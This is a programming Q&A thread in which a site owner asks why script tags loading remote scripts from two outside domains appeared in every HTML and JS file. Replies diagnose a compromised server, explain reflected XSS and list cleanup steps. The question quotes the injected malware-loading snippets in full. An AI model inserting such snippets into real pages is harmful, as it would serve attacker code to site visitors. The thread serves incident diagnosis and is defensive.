# All the HTML and JS files are affected by some scripts

Tags: javascript, html

My website all the html and js files are affected by some scripts.

The below script inside all the html files.

```
<!--937592--><script type="text/javascript" src="http://jamesdeocariza.com/cnt.php?id=5653691"></script><!--/937592-->
```

and the below script inside all the js files.

```
/*ec8243*/
document.write('<script type="text/javascript" src="http://brilleandmore.de/cgi-bin/cnt.php?id=5655549"></script>');
/*/ec8243*/
```

I don't know how this code inside all the html and js files. This `<!--937592-->` number and the `src="http://jamesdeocariza.com/cnt.php?id=5653691"` src url is not static. it's dynamic number and url.

Is this Cross Side Script (XSS) Attack?

Comment: If I try to open the both the links I get a `The Website Ahead Contains Malware!` warning in Chrome. I think it's wise to remove it from all your pages.

Comment: The first script [results in a 404](https://requestable.pieterhordijk.com/abCuvc) the [second one in a kinda 404](https://requestable.pieterhordijk.com/bbCuvc). So it looks like you got hacked (if those domains are not yours and you are not using some plugin which does this)

Comment: Are you using some version controller like `SVN`. because if there is any conflicts in the file then `SVN` add `mine>>>>>>>` and `theirs>>>>>`. So yours may be adding some version number.

Comment: On which server do you host your website? @PeeHaa: Maybe the malicious code is just shown, when the Referer-Header is set right...

Comment: I already removed it from all my files but I just want to know reason how that scripts inside in my files. is this cross side script attack?

Comment: @tampis maybe. I can add the header to try, but I don't have OPs URL.

Comment: @Bharadwaj. No I'm not using any SVN and it's not svn conflicts.

Comment: @AnbazhaganG: Cross side script attacks just occur after you clicked on a malicious formed link, which is not the case (I guess). It may have many reasons: Someone hacked into your server, you had a man in the middle while uploading your site via FTP, someone hacked into your computer or had access to you git repo...

Comment: @tampis: My website hosted in windows server 2003.

Comment: @AnbazhaganG: What is the domain for it/the URL to your server?

Comment: @tampis: how do we make sure is it Cross side script attacks?

Comment: @AnbazhaganG: As I read through the Wikipedia article of XSS attacks, it may have been a persistent XSS attack (if you use SQL as a database for your server, the attacker might have used a SQL injection, which works like the example below, just with an SQL statement...)

Comment: @tampis: Thank you for your answer. my server do not have any server side code files like (.asp, .php, .aspx ..etc). and I'm not using database. It's all html and js files only.

Answer (score 1):

If you are not the owner of the server `jamesdeocariza.com` and `brilleandmore.de` then it looked like your server was hacked and someone injected the above code into all of your HTML and JavaScript files.

To explain [XSS attacks](https://en.wikipedia.org/wiki/Cross-site_scripting): Imagine you have a bad written PHP file which contains code like:

```
<p>Your username <?php echo $_GET["user"] ?></p>
```

Now someone can write a malicious formed link to your site like `http://example.com/index.php?user=<script>//bad things</script>`. If someone clicks on such a link the server would serve an HTML document with

```
<p>Your username <script>//bad things</script></p>
```

(In reallity the link will be encoded using the URL encoding with `%XY`)

In your case it seems worse than just a XSS attack, because it seems that the attacker somehow could change the source code of your site. This may happen in many ways like hacking your PC or your server (maybe you have an virus on your PC). Getting access to your source repository (for example brute forcing the password of your github account) or you had a man in the middle while a unencrypted FTP upload...

Comment: Thank you for your answer. my server do not have any server side code files like (.asp, .php, .aspx ..etc). It's all html and js files only.

Comment: You should have a look on https://security.stackexchange.com/ There you will also get better answers (I am really not an expert in all the security stuff, just know the basics...)

Answer (score 1):

Your files are somehow compromised and the next steps you need are:

1. Remove the above 2 code snippets from your js and HTML files(all) immediately.
2. Check whether your site has been blacklisted by Google using tools like [Sucuri](http://sucuri.net/) and findout which other files are affected and remove the unwanted code from those pages
3. If Google already blacklisted your website, you will have to request a review AFTER cleaning all the infected files
4. Search for unwanted dynamic codes which are probably there as a result of this compromising and remove those files.
5. Find out how the attack may have occurred and fix it(website access logs will come in handy here)

Comment: thank you for the answer. I already did all the steps you mentioned except the last one #5. Now I'm just finding out how the attack happened, unfortunately I lost my all website logs.

Comment: Did you find any server side codes along with your files(like PHP)?

Comment: AFAIK this is not XSS